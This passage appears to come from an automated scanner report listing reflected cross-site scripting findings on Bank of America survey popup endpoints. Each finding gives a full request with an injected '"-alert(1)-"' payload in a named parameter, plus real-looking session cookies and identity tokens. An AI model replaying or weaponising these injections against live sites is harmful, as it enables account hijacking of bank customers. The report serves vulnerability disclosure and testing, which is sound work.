GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:00:42 GMT
Server: IBM_HTTP_Server
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 560

                       function show_survey_popup()
       {
           var popup_url = "/home-loans/home-loans/surveyPopupAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@mrpr@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yes9df42"-alert(1)-"16d5c2ded7a";
           var new_window;
           window.name = "SurveyParentApplicationAbandon";
           //alert("window.name=" + window.name);
           new_window = window.open( popup_url, "AppAbandonPopupWindow", "width=1,height=1,top
...[SNIP]...

1.35. https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go [SurveyName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/home-loans/surveyInitPopupAction.go

Issue detail

The value of the SurveyName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddad4"-alert(1)-"8816b5bf83d was submitted in the SurveyName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /home-loans/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes&SurveyName=Surveyddad4"-alert(1)-"8816b5bf83d&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@mrpr@amp@custid@eq@& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/home-loans/mortgage-purchase.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:00:44 GMT
Server: IBM_HTTP_Server
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 560

                       function show_survey_popup()
       {
           var popup_url = "/home-loans/home-loans/surveyPopupAction.go?SurveyName=Surveyddad4"-alert(1)-"8816b5bf83d&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@mrpr@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yes";
           var new_window;
           window.name = "SurveyParentApplicationAban
...[SNIP]...

1.36. https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go [SurveyUrl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/home-loans/surveyInitPopupAction.go

Issue detail

The value of the SurveyUrl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66e11"-alert(1)-"07725f68151 was submitted in the SurveyUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /home-loans/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes&SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@mrpr@amp@custid@eq@66e11"-alert(1)-"07725f68151& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/home-loans/mortgage-purchase.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:00:46 GMT
Server: IBM_HTTP_Server
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 560

                       function show_survey_popup()
       {
           var popup_url = "/home-loans/home-loans/surveyPopupAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@mrpr@amp@custid@eq@66e11"-alert(1)-"07725f68151&SurveyDimensions=scrollbars@eq@yes";
           var new_window;
           window.name = "SurveyParentApplicationAbandon";
           //alert("window.name=" + window.name);
           new_window = window.open( popup_url, "AppAbandon
...[SNIP]...

1.37. https://www9.bankofamerica.com/insurance/insurance/surveyPopupAction.go [SurveyDimensions parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/insurance/surveyPopupAction.go

Issue detail

The value of the SurveyDimensions request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c056b"-alert(1)-"0130f6fa5b1 was submitted in the SurveyDimensions parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /insurance/insurance/surveyPopupAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yesc056b"-alert(1)-"0130f6fa5b1 HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www9.bankofamerica.com/insurance/property-and-auto/overview.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:00:25 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9176

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

<title>Survey Detector</title>
<link rel="canonical" href="https://www8.bankofamerica.com/ContentWeb/cor
...[SNIP]...
var popup_url = "/insurance/surveyShowAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yesc056b"-alert(1)-"0130f6fa5b1";
if (popup_url && popup_url != "") {
new_window = window.open ( popup_url, "SurveyPopUp" , "width=380,height=280,left=20,top=20" );

...[SNIP]...

1.38. https://www9.bankofamerica.com/insurance/insurance/surveyPopupAction.go [SurveyName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/insurance/surveyPopupAction.go

Issue detail

The value of the SurveyName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2b41"-alert(1)-"3b1b7b9f569 was submitted in the SurveyName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /insurance/insurance/surveyPopupAction.go?SurveyName=Surveye2b41"-alert(1)-"3b1b7b9f569&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yes HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www9.bankofamerica.com/insurance/property-and-auto/overview.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:00:20 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9176

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

<title>Survey Detector</title>
<link rel="canonical" href="https://www8.bankofamerica.com/ContentWeb/cor
...[SNIP]...
<!--
function inviteRespondent()
{
var popup_url = "/insurance/surveyShowAction.go?SurveyName=Surveye2b41"-alert(1)-"3b1b7b9f569&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yes";
if (popup_url && popup_url != "") {

...[SNIP]...

1.39. https://www9.bankofamerica.com/insurance/insurance/surveyPopupAction.go [SurveyUrl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/insurance/surveyPopupAction.go

Issue detail

The value of the SurveyUrl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34214"-alert(1)-"6211e43ab6 was submitted in the SurveyUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /insurance/insurance/surveyPopupAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@34214"-alert(1)-"6211e43ab6&SurveyDimensions=scrollbars@eq@yes HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www9.bankofamerica.com/insurance/property-and-auto/overview.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:00:22 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9175

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

<title>Survey Detector</title>
<link rel="canonical" href="https://www8.bankofamerica.com/ContentWeb/cor
...[SNIP]...
{
var popup_url = "/insurance/surveyShowAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@34214"-alert(1)-"6211e43ab6&SurveyDimensions=scrollbars@eq@yes";
if (popup_url && popup_url != "") {
new_window = window.open ( popup_url, "SurveyPopUp" , "width=380,height=280,
...[SNIP]...

1.40. https://www9.bankofamerica.com/insurance/surveyInitPopupAction.go [SurveyDimensions parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/surveyInitPopupAction.go

Issue detail

The value of the SurveyDimensions request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d885f"-alert(1)-"ce5d9ef8fa3 was submitted in the SurveyDimensions parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /insurance/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yesd885f"-alert(1)-"ce5d9ef8fa3&SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/insurance/property-and-auto/overview.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; 